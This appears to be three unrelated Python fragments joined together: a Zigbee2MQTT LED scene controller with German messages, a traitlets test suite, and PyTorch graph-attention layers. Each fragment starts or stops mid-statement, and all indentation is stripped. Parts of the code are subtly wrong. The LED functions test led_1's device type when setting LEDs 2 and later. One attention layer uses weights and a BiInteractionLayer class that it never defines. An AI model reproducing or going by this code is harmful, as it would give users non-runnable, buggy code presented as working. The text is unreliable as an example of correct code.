scene = GET_LED_SCENE_BY_ID(scene_id)
# led 1
led_1 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_1)
if CHECK_ZIGBEE2MQTT_SETTING(led_1.name, setting, limit) == False:
error_list.append(led_1.name + " >>> Setting not confirmed")
# led 2
led_2 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_2)
if group.active_led_2 == "True":
if scene.active_setting_2 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_2.name, setting, limit) == False:
error_list.append(led_2.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_2.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_2.name + " >>> Setting not confirmed")
# led 3
led_3 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_3)
if group.active_led_3 == "True":
if scene.active_setting_3 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_3.name, setting, limit) == False:
error_list.append(led_3.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_3.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_3.name + " >>> Setting not confirmed")
# led 4
led_4 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_4)
if group.active_led_4 == "True":
if scene.active_setting_4 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_4.name, setting, limit) == False:
error_list.append(led_4.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_4.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_4.name + " >>> Setting not confirmed")
# led 5
led_5 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_5)
if group.active_led_5 == "True":
if scene.active_setting_5 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_5.name, setting, limit) == False:
error_list.append(led_5.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_5.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_5.name + " >>> Setting not confirmed")
# led 6
led_6 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_6)
if group.active_led_6 == "True":
if scene.active_setting_6 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_6.name, setting, limit) == False:
error_list.append(led_6.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_6.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_6.name + " >>> Setting not confirmed")
# led 7
led_7 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_7)
if group.active_led_7 == "True":
if scene.active_setting_7 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_7.name, setting, limit) == False:
error_list.append(led_7.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_7.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_7.name + " >>> Setting not confirmed")
# led 8
led_8 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_8)
if group.active_led_8 == "True":
if scene.active_setting_8 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_8.name, setting, limit) == False:
error_list.append(led_8.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_8.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_8.name + " >>> Setting not confirmed")
# led 9
led_9 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_9)
if group.active_led_9 == "True":
if scene.active_setting_9 == "True":
if CHECK_ZIGBEE2MQTT_SETTING(led_9.name, setting, limit) == False:
error_list.append(led_9.name + " >>> Setting not confirmed")
else:
if CHECK_ZIGBEE2MQTT_SETTING(led_9.name, '{"state":"OFF"}', limit) == False:
error_list.append(led_9.name + " >>> Setting not confirmed")
return error_list
except Exception as e:
print(e)
WRITE_LOGFILE_SYSTEM("ERROR", "LED | Start Scene | " + setting + " | " + str(e))
SEND_EMAIL("ERROR", "LED | Start Scene | " + setting + " | " + str(e))
return [str(e)]
else:
return ["Keine LED-Steuerung aktiviert"]
""" ##################### """
""" led group functions """
""" ##################### """
def SET_LED_GROUP_SCENE(group_id, scene_id, brightness_global = 100):
if GET_GLOBAL_SETTING_VALUE("zigbee2mqtt") == "True":
try:
group = GET_LED_GROUP_BY_ID(group_id)
scene = GET_LED_SCENE_BY_ID(scene_id)
# led 1
led_1 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_1)
brightness_1 = scene.brightness_1*(brightness_global/100)
if led_1.device_type == "led_rgb":
SET_LED_BULB_RGB(led_1.name, scene.red_1, scene.green_1, scene.blue_1, int(brightness_1))
if led_1.device_type == "led_white":
SET_LED_BULB_WHITE(led_1.name, scene.color_temp_1, int(brightness_1))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_1.name, int(brightness_1))
# led 2
led_2 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_2)
if group.active_led_2 == "True":
if scene.active_setting_2 == "True":
brightness_2 = scene.brightness_2*(brightness_global/100)
if led_2.device_type == "led_rgb":
SET_LED_BULB_RGB(led_2.name, scene.red_2, scene.green_2, scene.blue_2, int(brightness_2))
if led_2.device_type == "led_white":
SET_LED_BULB_WHITE(led_2.name, scene.color_temp_2, int(brightness_2))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_2.name, int(brightness_2))
else:
SET_LED_BULB_TURN_OFF(led_2.name)
# led 3
led_3 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_3)
if group.active_led_3 == "True":
if scene.active_setting_3 == "True":
brightness_3 = scene.brightness_3*(brightness_global/100)
if led_3.device_type == "led_rgb":
SET_LED_BULB_RGB(led_3.name, scene.red_3, scene.green_3, scene.blue_3, int(brightness_3))
if led_3.device_type == "led_white":
SET_LED_BULB_WHITE(led_3.name, scene.color_temp_3, int(brightness_3))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_3.name, int(brightness_3))
else:
SET_LED_BULB_TURN_OFF(led_3.name)
# led 4
led_4 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_4)
if group.active_led_4 == "True":
if scene.active_setting_4 == "True":
brightness_4 = scene.brightness_4*(brightness_global/100)
if led_4.device_type == "led_rgb":
SET_LED_BULB_RGB(led_4.name, scene.red_4, scene.green_4, scene.blue_4, int(brightness_4))
if led_4.device_type == "led_white":
SET_LED_BULB_WHITE(led_4.name, scene.color_temp_4, int(brightness_4))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_4.name, int(brightness_4))
else:
SET_LED_BULB_TURN_OFF(led_4.name)
# led 5
led_5 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_5)
if group.active_led_5 == "True":
if scene.active_setting_5 == "True":
brightness_5 = scene.brightness_5*(brightness_global/100)
if led_5.device_type == "led_rgb":
SET_LED_BULB_RGB(led_5.name, scene.red_5, scene.green_5, scene.blue_5, int(brightness_5))
if led_5.device_type == "led_white":
SET_LED_BULB_WHITE(led_5.name, scene.color_temp_5, int(brightness_5))
if led_1.device_type == "led_simple":
SET_LED_BULB_SIMPLE(led_5.name, int(brightness_5))
else:
SET_LED_BULB_TURN_OFF(led_5.name)
# led 6
led_6 = GET_MQTT_DEVICE_BY_IEEEADDR(group.led_ieeeAddr_6)
if group.active_led_6 == "True":
if scene.active_setting_6 == "True":
brightness_6 = scene.brightness_6*(brightness_global/100)
if led_6.device_type == "led_rgb":
SET_LED_BULB_RGB(led_6.name, scene.red_6, scene.green_6, scene.blue_6, int(brightness_6))
if led_6.device_type == "led_white":
SET_LED_BULB_WHITE(led_6.name, scene.color_temp_6, int(brightness_6))
if led_1.device_type == | |
self.assertTrue(isinstance(a.inst, Foo))
a.inst = Bar()
self.assertTrue(isinstance(a.inst, Foo))
self.assertRaises(TraitError, setattr, a, 'inst', Foo)
self.assertRaises(TraitError, setattr, a, 'inst', Bar)
self.assertRaises(TraitError, setattr, a, 'inst', Bah())
def test_unique_default_value(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo,(),{})
a = A()
b = A()
self.assertTrue(a.inst is not b.inst)
def test_args_kw(self):
class Foo(object):
def __init__(self, c): self.c = c
class Bar(object): pass
class Bah(object):
def __init__(self, c, d):
self.c = c; self.d = d
class A(HasTraits):
inst = Instance(Foo, (10,))
a = A()
self.assertEqual(a.inst.c, 10)
class B(HasTraits):
inst = Instance(Bah, args=(10,), kw=dict(d=20))
b = B()
self.assertEqual(b.inst.c, 10)
self.assertEqual(b.inst.d, 20)
class C(HasTraits):
inst = Instance(Foo, allow_none=True)
c = C()
self.assertTrue(c.inst is None)
def test_bad_default(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo)
a = A()
with self.assertRaises(TraitError):
a.inst
def test_instance(self):
class Foo(object): pass
def inner():
class A(HasTraits):
inst = Instance(Foo())
self.assertRaises(TraitError, inner)
class TestThis(TestCase):
def test_this_class(self):
class Foo(HasTraits):
this = This
f = Foo()
self.assertEqual(f.this, None)
g = Foo()
f.this = g
self.assertEqual(f.this, g)
self.assertRaises(TraitError, setattr, f, 'this', 10)
def test_this_inst(self):
class Foo(HasTraits):
this = This()
f = Foo()
f.this = Foo()
self.assertTrue(isinstance(f.this, Foo))
def test_subclass(self):
class Foo(HasTraits):
t = This()
class Bar(Foo):
pass
f = Foo()
b = Bar()
f.t = b
b.t = f
self.assertEqual(f.t, b)
self.assertEqual(b.t, f)
def test_subclass_override(self):
class Foo(HasTraits):
t = This()
class Bar(Foo):
t = This()
f = Foo()
b = Bar()
f.t = b
self.assertEqual(f.t, b)
self.assertRaises(TraitError, setattr, b, 't', f)
def test_this_in_container(self):
class Tree(HasTraits):
value = Unicode()
leaves = List(This())
tree = Tree(
value='foo',
leaves=[Tree('bar'), Tree('buzz')]
)
with self.assertRaises(TraitError):
tree.leaves = [1, 2]
class TraitTestBase(TestCase):
"""A best testing class for basic trait types."""
def assign(self, value):
self.obj.value = value
def coerce(self, value):
return value
def test_good_values(self):
if hasattr(self, '_good_values'):
for value in self._good_values:
self.assign(value)
self.assertEqual(self.obj.value, self.coerce(value))
def test_bad_values(self):
if hasattr(self, '_bad_values'):
for value in self._bad_values:
try:
self.assertRaises(TraitError, self.assign, value)
except AssertionError:
assert False, value
def test_default_value(self):
if hasattr(self, '_default_value'):
self.assertEqual(self._default_value, self.obj.value)
def test_allow_none(self):
if (hasattr(self, '_bad_values') and hasattr(self, '_good_values') and
None in self._bad_values):
trait=self.obj.traits()['value']
try:
trait.allow_none = True
self._bad_values.remove(None)
#skip coerce. Allow None casts None to None.
self.assign(None)
self.assertEqual(self.obj.value,None)
self.test_good_values()
self.test_bad_values()
finally:
#tear down
trait.allow_none = False
self._bad_values.append(None)
def tearDown(self):
# restore default value after tests, if set
if hasattr(self, '_default_value'):
self.obj.value = self._default_value
class AnyTrait(HasTraits):
value = Any
class AnyTraitTest(TraitTestBase):
obj = AnyTrait()
_default_value = None
_good_values = [10.0, 'ten', u'ten', [10], {'ten': 10},(10,), None, 1j]
_bad_values = []
class UnionTrait(HasTraits):
value = Union([Type(), Bool()])
class UnionTraitTest(TraitTestBase):
obj = UnionTrait(value='ipython_genutils.ipstruct.Struct')
_good_values = [int, float, True]
_bad_values = [[], (0,), 1j]
class OrTrait(HasTraits):
value = Bool() | Unicode()
class OrTraitTest(TraitTestBase):
obj = OrTrait()
_good_values = [True, False, 'ten']
_bad_values = [[], (0,), 1j]
class IntTrait(HasTraits):
value = Int(99, min=-100)
class TestInt(TraitTestBase):
obj = IntTrait()
_default_value = 99
_good_values = [10, -10]
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
10.1, -10.1, '10L', '-10L', '10.1', '-10.1', u'10L',
u'-10L', u'10.1', u'-10.1', '10', '-10', u'10', -200]
if not py3compat.PY3:
_bad_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
class LongTrait(HasTraits):
value = Long(99 if py3compat.PY3 else long(99))
class TestLong(TraitTestBase):
obj = LongTrait()
_default_value = 99 if py3compat.PY3 else long(99)
_good_values = [10, -10]
_bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
None, 1j, 10.1, -10.1, '10', '-10', '10L', '-10L', '10.1',
'-10.1', u'10', u'-10', u'10L', u'-10L', u'10.1',
u'-10.1']
if not py3compat.PY3:
# maxint undefined on py3, because int == long
_good_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
_bad_values.extend([[long(10)], (long(10),)])
@skipif(py3compat.PY3, "not relevant on py3")
def test_cast_small(self):
"""Long casts ints to long"""
self.obj.value = 10
self.assertEqual(type(self.obj.value), long)
class IntegerTrait(HasTraits):
value = Integer(1)
class TestInteger(TestLong):
obj = IntegerTrait()
_default_value = 1
def coerce(self, n):
return int(n)
@skipif(py3compat.PY3, "not relevant on py3")
def test_cast_small(self):
"""Integer casts small longs to int"""
if py3compat.PY3:
raise SkipTest("not relevant on py3")
self.obj.value = long(100)
self.assertEqual(type(self.obj.value), int)
class FloatTrait(HasTraits):
value = Float(99.0, max=200.0)
class TestFloat(TraitTestBase):
obj = FloatTrait()
_default_value = 99.0
_good_values = [10, -10, 10.1, -10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None,
1j, '10', '-10', '10L', '-10L', '10.1', '-10.1', u'10',
u'-10', u'10L', u'-10L', u'10.1', u'-10.1', 201.0]
if not py3compat.PY3:
_bad_values.extend([long(10), long(-10)])
class ComplexTrait(HasTraits):
value = Complex(99.0-99.0j)
class TestComplex(TraitTestBase):
obj = ComplexTrait()
_default_value = 99.0-99.0j
_good_values = [10, -10, 10.1, -10.1, 10j, 10+10j, 10-10j,
10.1j, 10.1+10.1j, 10.1-10.1j]
_bad_values = [u'10L', u'-10L', 'ten', [10], {'ten': 10},(10,), None]
if not py3compat.PY3:
_bad_values.extend([long(10), long(-10)])
class BytesTrait(HasTraits):
value = Bytes(b'string')
class TestBytes(TraitTestBase):
obj = BytesTrait()
_default_value = b'string'
_good_values = [b'10', b'-10', b'10L',
b'-10L', b'10.1', b'-10.1', b'string']
_bad_values = [10, -10, 10.1, -10.1, 1j, [10],
['ten'],{'ten': 10},(10,), None, u'string']
if not py3compat.PY3:
_bad_values.extend([long(10), long(-10)])
class UnicodeTrait(HasTraits):
value = Unicode(u'unicode')
class TestUnicode(TraitTestBase):
obj = UnicodeTrait()
_default_value = u'unicode'
_good_values = ['10', '-10', '10L', '-10L', '10.1',
'-10.1', '', u'', 'string', u'string', u"€"]
_bad_values = [10, -10, 10.1, -10.1, 1j,
[10], ['ten'], [u'ten'], {'ten': 10},(10,), None]
if not py3compat.PY3:
_bad_values.extend([long(10), long(-10)])
class ObjectNameTrait(HasTraits):
value = ObjectName("abc")
class TestObjectName(TraitTestBase):
obj = ObjectNameTrait()
_default_value = "abc"
_good_values = ["a", "gh", "g9", "g_", "_G", u"a345_"]
_bad_values = [1, "", u"€", "9g", "!", "#abc", "aj@", "a.b", "a()", "a[0]",
None, object(), object]
if sys.version_info[0] < 3:
_bad_values.append(u"þ")
else:
_good_values.append(u"þ") # þ=1 is valid in Python 3 (PEP 3131).
class DottedObjectNameTrait(HasTraits):
value = DottedObjectName("a.b")
class TestDottedObjectName(TraitTestBase):
obj = DottedObjectNameTrait()
_default_value = "a.b"
_good_values = ["A", "y.t", "y765.__repr__", "os.path.join", u"os.path.join"]
_bad_values = [1, u"abc.€", "_.@", ".", ".abc", "abc.", ".abc.", None]
if sys.version_info[0] < 3:
_bad_values.append(u"t.þ")
else:
_good_values.append(u"t.þ")
class TCPAddressTrait(HasTraits):
value = TCPAddress()
class TestTCPAddress(TraitTestBase):
obj = TCPAddressTrait()
_default_value = ('127.0.0.1',0)
_good_values = [('localhost',0),('192.168.0.1',1000),('www.google.com',80)]
_bad_values = [(0,0),('localhost',10.0),('localhost',-1), None]
class ListTrait(HasTraits):
value = List(Int)
class TestList(TraitTestBase):
obj = ListTrait()
_default_value = []
_good_values = [[], [1], list(range(10)), (1,2)]
_bad_values = [10, [1,'a'], 'a']
def coerce(self, value):
if value is not None:
value = list(value)
return value
class Foo(object):
pass
class NoneInstanceListTrait(HasTraits):
value = List(Instance(Foo))
class TestNoneInstanceList(TraitTestBase):
obj = NoneInstanceListTrait()
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [[None], [Foo(), None]]
class InstanceListTrait(HasTraits):
value = List(Instance(__name__+'.Foo'))
class TestInstanceList(TraitTestBase):
obj = InstanceListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, Foo)
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [['1', 2,], '1', [Foo], None]
class UnionListTrait(HasTraits):
value = List(Int() | Bool())
class TestUnionListTrait(HasTraits):
obj = UnionListTrait()
_default_value = []
_good_values = [[True, 1], [False, True]]
_bad_values = [[1, 'True'], False]
class LenListTrait(HasTraits):
value = List(Int, [0], minlen=1, maxlen=2)
class TestLenList(TraitTestBase):
obj = LenListTrait()
_default_value = [0]
_good_values = [[1], [1,2], (1,2)]
_bad_values = [10, [1,'a'], 'a', [], list(range(3))]
def coerce(self, value):
if value is not None:
value = list(value)
return value
class TupleTrait(HasTraits):
value = Tuple(Int(allow_none=True), default_value=(1,))
class TestTupleTrait(TraitTestBase):
obj = TupleTrait()
_default_value = (1,)
_good_values = [(1,), (0,), [1]]
_bad_values = [10, (1, 2), ('a'), (), None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int, CBytes, default_value=(1,5))
class LooseTupleTrait(HasTraits):
value = Tuple((1,2,3))
class TestLooseTupleTrait(TraitTestBase):
obj = LooseTupleTrait()
_default_value = (1,2,3)
_good_values = [(1,), [1], (0,), tuple(range(5)), tuple('hello'), ('a',5), ()]
_bad_values = [10, 'hello', {}, None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int, CBytes, default_value=(1,5))
class MultiTupleTrait(HasTraits):
value = Tuple(Int, Bytes, default_value=[99,b'bottles'])
class TestMultiTuple(TraitTestBase):
obj = MultiTupleTrait()
_default_value = (99,b'bottles')
_good_values = [(1,b'a'), (2,b'b')]
_bad_values = ((),10, b'a', (1,b'a',3), (b'a',1), (1, u'a'))
class CRegExpTrait(HasTraits):
value = CRegExp(r'')
class TestCRegExp(TraitTestBase):
def coerce(self, value):
return re.compile(value)
obj = CRegExpTrait()
_default_value = re.compile(r'')
_good_values = [r'\d+', re.compile(r'\d+')]
_bad_values = ['(', None, ()]
class DictTrait(HasTraits):
value = Dict()
def test_dict_assignment():
d = dict()
c = DictTrait()
c.value = d
d['a'] = 5
nt.assert_equal(d, c.value)
nt.assert_true(c.value is d)
class ValidatedDictTrait(HasTraits):
value = Dict(trait=Unicode(),
traits={'foo': Int()},
default_value={'foo': 1})
class TestInstanceDict(TraitTestBase):
obj = ValidatedDictTrait()
_default_value = {'foo': 1}
_good_values = [{'0': 'foo', 'foo': 1}, {'1': 'bar', 'foo': 2}]
_bad_values = [{'0': 0, 'foo': 1}, {'1': 'bar', 'foo': 'bar'}]
def test_dict_default_value():
"""Check that the `{}` default value of the Dict traitlet constructor is
actually copied."""
class Foo(HasTraits):
d1 = Dict()
d2 = Dict()
foo = Foo()
nt.assert_equal(foo.d1, {})
nt.assert_equal(foo.d2, {})
nt.assert_is_not(foo.d1, foo.d2)
class TestValidationHook(TestCase):
def test_parity_trait(self):
"""Verify that the early validation hook is effective"""
class Parity(HasTraits):
value = Int(0)
parity = Enum(['odd', | |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import math
class GraphConvolutionLayer(nn.Module):
"""
Base graph convolution layer.
"""
def __init__(self):
super(GraphConvolutionLayer, self).__init__()
pass
def forward(self, feat, adj):
"""
a overview of logic, can be override
:param adj:
:param feat:
:return:
"""
h_prime = self._aggregate(feat, adj)
return self._update(feat, h_prime)
def _aggregate(self, feat, adj):
print("Unimplemented!")
def _update(self, feat, feat_prime):
print("Unimplemented!")
class BaseGraphAttentionLayer(GraphConvolutionLayer):
def __init__(self):
super(BaseGraphAttentionLayer, self).__init__()
pass
def _attention(self, feat, adj):
print("Unimplemented!")
def _aggregate(self, feat, adj):
"""
a overview of logic, can be override.
:param adj:
:param feat:
:return:
"""
weight = self._attention(feat, adj)
h_prime = torch.matmul(weight, feat)
return h_prime
class GraphAttentionLayer(BaseGraphAttentionLayer):
"""
Simple GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha, activation, residual_connection = False, num_basis= True):
super(GraphAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha = alpha
self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), dtype= torch.float))
nn.init.xavier_uniform_(self.W.data, gain=1.414)
self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype= torch.float))
nn.init.xavier_uniform_(self.a_1.data, gain=1) # how to choose a proper gain number
self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype= torch.float))
nn.init.xavier_uniform_(self.a_2.data, gain=1)
self.leakyrelu = nn.LeakyReLU(self.alpha)
self.activation= activation
def _attention(self, h, adj):
logit_1= torch.matmul(h, self.a_1)
logit_2= torch.matmul(h, self.a_2)
logits= logit_1 + logit_2.permute(0, 2, 1)
e= self.leakyrelu(logits)
zero_vec = -9e15* e.new_tensor([1., ])
attention = torch.where(adj > 0, e, zero_vec)
attention = F.softmax(attention, dim= -1)
return attention
def _aggregate(self, feat, adj):
h = torch.matmul(feat, self.W)
attention = self._attention(h, adj)
attention = F.dropout(attention, self.dropout, training=self.training)
h_out = torch.bmm(attention, h)
return h_out
def _update(self, feat, feat_prime):
if self.activation != None:
return self.activation(feat_prime)
else:
return feat_prime
return feat_prime
def forward(self, input, adj):
h_prime = self._aggregate(input, adj)
return self._update(input, h_prime)
def extra_repr(self):
return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
# TODO: change to batch training
class GraphDiffusedAttentionLayer(nn.Module):
"""
Simple GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha):
super(GraphDiffusedAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha = alpha
self.W = nn.Parameter(torch.zeros(size=(in_features, out_features), dtype= torch.float))
nn.init.xavier_uniform_(self.W.data, gain=1.414)
self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype= torch.float))
nn.init.xavier_uniform_(self.a_1.data, gain=1.414)
self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype= torch.float))
nn.init.xavier_uniform_(self.a_2.data, gain=1.414)
self.leakyrelu = nn.LeakyReLU(self.alpha)
def forward(self, input, adj):
h = torch.matmul(input, self.W)
logit_1= torch.matmul(h, self.a_1)
logit_2= torch.matmul(h, self.a_2)
logits= logit_1 + logit_2.permute(1, 0)
e= self.leakyrelu(logits)
zero_vec = -9e15* e.new_tensor([1., ])
e = torch.where(adj > 0, e, zero_vec)
mean_h = torch.mean(h, dim= 0, keepdim= True)
h_all= torch.cat([h, mean_h], 0)
glob_logit_2= torch.mm(mean_h, self.a_2)
glob_logit= logit_1 + glob_logit_2
e_diffused= self.leakyrelu(glob_logit)
e_all= torch.cat([e, e_diffused], -1)
attention = F.softmax(e_all, dim= -1)
attention = F.dropout(attention, self.dropout, training=self.training)
h_out = torch.mm(attention, h_all)
return F.elu(h_out)
def __repr__(self):
return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
# TODO:
class Order1GraphMLPAttentionLayer(nn.Module):
"""
Improved GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis = 5):
super(Order1GraphMLPAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha = alpha
self.W_1= nn.Parameter(torch.zeros(size=(in_features, out_features), ))
nn.init.xavier_uniform_(self.W_1.data, gain=1.414)
self.W_2 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
nn.init.xavier_uniform_(self.W_2.data, gain=1.414)
self.attention_layer = BiInteractionLayer()
self.leakyrelu = nn.LeakyReLU(self.alpha)
self.activation= activation
def _attention(self, feat, adj):
h = torch.matmul(feat, self.W)
Ax = torch.matmul(h, self.a_1)
Ay = torch.matmul(h, self.a_2)
A_xy_1= torch.matmul(h, self.a_12)
A_xy= torch.matmul(A_xy_1, h.permute(0, 2, 1))
# Ax_prime= torch.matmul(nd_flags, Ax.permute(0, 2, 1))
# nd_flags_T= nd_flags.permute(0, 2, 1)
# Ay_prime= torch.matmul(Ay, nd_flags_T)
Ax_prime= Ax.permute(0, 2, 1)
Ay_prime= Ay
logits = Ax_prime + Ay_prime + A_xy
e = self.leakyrelu(logits)
zero_vec = -9e15 * e.new_tensor([1., ])
e = torch.where(adj > 0, e, zero_vec)
attention = F.softmax(e, dim=-1)
# attention= torch.where(adj > 0, attention, attention.new_tensor([0., ]))
attention = F.dropout(attention, self.dropout, training=self.training)
return attention
def _aggregate(self, feat, adj):
attention = self._attention(feat, adj)
h_prime = torch.matmul(attention, feat)
return h_prime
def _update(self, feat, feat_agg):
h_1 = torch.matmul(feat, self.W_1)
h_2 = torch.matmul(feat_agg, self.W_2)
h_out = h_1 + h_2
if not self.activation:
return h_out
else:
return self.activation(h_out)
def forward(self, feat, adj):
feat_agg = self._aggregate(feat, adj)
return self._update(feat, feat_agg)
def extra_repr(self):
return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
class Order1GraphAttentionLayer(nn.Module):
"""
Improved GAT layer, similar to https://arxiv.org/abs/1710.10903
"""
def __init__(self, in_features, out_features, dropout, alpha, activation, num_basis = 5):
super(Order1GraphAttentionLayer, self).__init__()
self.dropout = dropout
self.in_features = in_features
self.out_features = out_features
self.alpha = alpha
self.W= nn.Parameter(torch.zeros(size=(in_features, out_features), ))
nn.init.xavier_uniform_(self.W.data, gain=1.414)
self.W_1= nn.Parameter(torch.zeros(size=(in_features, out_features), ))
nn.init.xavier_uniform_(self.W_1.data, gain=1.414)
self.W_2 = nn.Parameter(torch.zeros(size=(in_features, out_features), ))
nn.init.xavier_uniform_(self.W_2.data, gain=1.414)
self.a_1 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
nn.init.xavier_uniform_(self.a_1.data, gain=1.414)
self.a_2 = nn.Parameter(torch.zeros(size=(out_features, 1), dtype=torch.float))
nn.init.xavier_uniform_(self.a_2.data, gain=1.414)
self.a_12 = nn.Parameter(torch.zeros(size=(out_features, out_features)))
bound = 1 / math.sqrt(self.a_12.size(0))
nn.init.uniform_(self.a_12, -bound, bound)
# nn.init.xavier_uniform_(self.a_12.data, gain=1.414)
self.W_xy= nn.Parameter(torch.zeros(size= (out_features, 1)))
nn.init.xavier_uniform_(self.W_xy.data, gain= 1.414)
self.leakyrelu = nn.LeakyReLU(self.alpha)
self.activation= activation
def _attention(self, feat, adj):
h = torch.matmul(feat, self.W)
Ax = torch.matmul(h, self.a_1)
Ay = torch.matmul(h, self.a_2)
# A_xy_1= torch.matmul(h, self.a_12)
# A_xy= torch.matmul(A_xy_1, h.permute(0, 2, 1))
Ax_prime= Ax.permute(0, 2, 1)
Ay_prime= Ay
logits = Ax_prime + Ay_prime
# logits = Ax_prime + Ay_prime + A_xy
e = self.leakyrelu(logits)
zero_vec = -9e15 * e.new_tensor([1., ])
e = torch.where(adj > 0, e, zero_vec)
attention = F.softmax(e, dim=-1)
# attention= torch.where(adj > 0, attention, attention.new_tensor([0., ]))
attention = F.dropout(attention, self.dropout, training=self.training)
return attention
def _aggregate(self, feat, adj):
attention = self._attention(feat, adj)
h_prime = torch.matmul(attention, feat)
return h_prime
def _update(self, feat, feat_agg):
# h_1 = torch.matmul(feat, self.W_1)
h_2 = torch.matmul(feat_agg, self.W)
h_out = h_2
# h_out = h_1 + h_2
if not self.activation:
return h_out
else:
return self.activation(h_out)
def forward(self, feat, adj):
feat_agg = self._aggregate(feat, adj)
return self._update(feat, feat_agg)
def extra_repr(self):
return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'
class SVDBilinear(nn.Module):
"""
my bilinear matmul but reducing parameter dimension using peusodu-SVD
"""
def __init__(self, num_basis, in1_features, in2_features, out_features):
super(SVDBilinear, self).__init__()
self.num_basis = num_basis
self.in1_features = in1_features
self.in2_features = in2_features
self.out_features = out_features
self.left_singular = nn.Parameter(torch.Tensor(out_features, in1_features, num_basis))
self.right_singular = nn.Parameter(torch.Tensor(out_features, num_basis, in2_features))
self.diag = nn.Parameter(torch.Tensor(out_features, 1, num_basis))
self.reset_parameter()
def reset_parameter(self):
init.xavier_uniform_(self.left_singular, gain = 1.414)
init.xavier_uniform_(self.right_singular, gain= 1.414)
init.normal_(self.diag, 0, 1/ math.sqrt(self.diag.size(-1)))
def forward(self, in1, in2):
us = self.left_singular * self.diag
usv = torch.matmul(us, self.right_singular)
return F.bilinear(in1, in2, weight= usv)
def __repr__(self):
return "SVDBilinear Layer: in1_features={}, in2_features={}, out_features={}, num_basis={}".format(
self.in1_features, self.in2_features, self.out_features, self.num_basis
)
